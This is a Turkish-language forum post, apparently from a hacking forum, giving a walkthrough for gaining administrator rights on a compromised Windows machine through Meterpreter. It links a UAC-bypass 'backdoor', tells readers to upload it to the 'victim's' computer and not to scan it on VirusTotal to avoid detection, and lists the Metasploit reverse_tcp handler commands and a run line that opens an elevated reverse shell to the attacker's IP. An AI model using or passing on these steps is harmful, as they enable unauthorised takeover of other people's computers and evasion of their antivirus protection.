Meterpreter İle Admin Yetkisine Sahip Olma[video] (1 Viewer)

Joined
Oct 26, 2017
Credits
0
Rating - 0%
Arkadaşlar Herkeze Selam. Bugün Sizlere Meterpreter İle Karşı Bilgisayarda Nasıl Admin Yetkisine Sahip Olunur Onu Göstereceğim. Öncelikle Şunu Bilmeniz Gerek Ki , Artık Metasploit Deki Hiçbir Admin Olma Yöntemi İşe Yaramıyor. Artık Güncel Antivirüs Programları Bırakın Admin Olmayı , Admin Olup Olmadığımızı Sorgulamamıza Bile İzin Vermiyor. Admin Olmak Çok Çok Önemlidir. Admin Yetkisine Sahip Değilsen , Ozaman Meterpreter İle Çok Da Birşey Yapamazsın. Meterpreter İle Persistence (Kalıcı) Olmayı Da Size Diğer Video Da Göstereceğim. Diğer Video Da Windows Defender’İ Kapatmayı - Windows Güvenlik Duvarını Kapatmayı - Yönetici Olarak Bir Uygulamayı Çalıştırdığımızda Evet Hayır Diye Bir Seçenek Çıkar, O Seçeneğin Çıkmaması İçin Çeşitli Yöntemler Uygulamayı -Kurbanın Bilgisayarında Ki Windows Update Ayarları İle Oynayarak Otomotik Güncellemeleri Kapatmayı - Admin Yetkisinde Çalışacak Bir Backdoor Yapmasını Göstereceğim. Diğer Video Muhteşem Birşey Olacak.

admin yetkisine sahip olmak için kullanacağımz backdoor’un indirme linki :
https://github.com/Cn33liz/TpmInitUACBypass/releases

virüs total :
https://www.virustotal.com/#/url/59...3b1e12e9e5de9d52bbe797529dc64f79d0e/detection

not: virüs total sonucu temiz gösteriyor. fakat ben programın bulunduğu sitenin adresini tarattım. Daha önce backdoor’u bilgisayarıma indirdiğimde virüs total de taratmış tım 6-7 tane virüslü çıkmış dı virüs total da. isteyen backdoor’u indirdikten sonra nodistribute da taratabilir. virüs total da taratmayınız.

kullanım :

ilk başta karşı bilgisayara sızmış olmalısınız. karşı bilgisayarda getsystem yazdığımızda admin yetkisine sahip olup olmadığımızı öğrenebiliriz.
fakat bırakın admin yetkisi almayı , admin yetkisindemiyiz diye sorduğumuz da bile wiindows defender hemen algılıyor getsystem komutunu.
video da görebilirsinz bunu. github dan backdoor'u indirin ve karşı bilgisayara upload edin .daha sonra farklı bir terminal açın ve msfconsole yazarak yeni bir metasploit sayfası açın.

use multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost ip_adresiniz

set lport port_numarası

run

yazıp upload ettiğimiz backdoor'u dinlemeye alıyoruz. daha sonra tekrar bir önceki meterpreter oturumuna geçiyoruz ve komutları yazıyoruz

shell (bu komut ile kurbanın cmd sine giriyoruz)

upload_ettiğimiz_backdoor_adı.exe ip_adresimiz port_numarası msf

videoya göre yazdığım komut

virus.exe 192.168.1.34 4444 msf

bu komut ile backdooru çalıştırıyoruz ve dinleme aldığımız meterpreter oturumu admin olarak açılıyor.....


 

Users who are viewing this thread

Top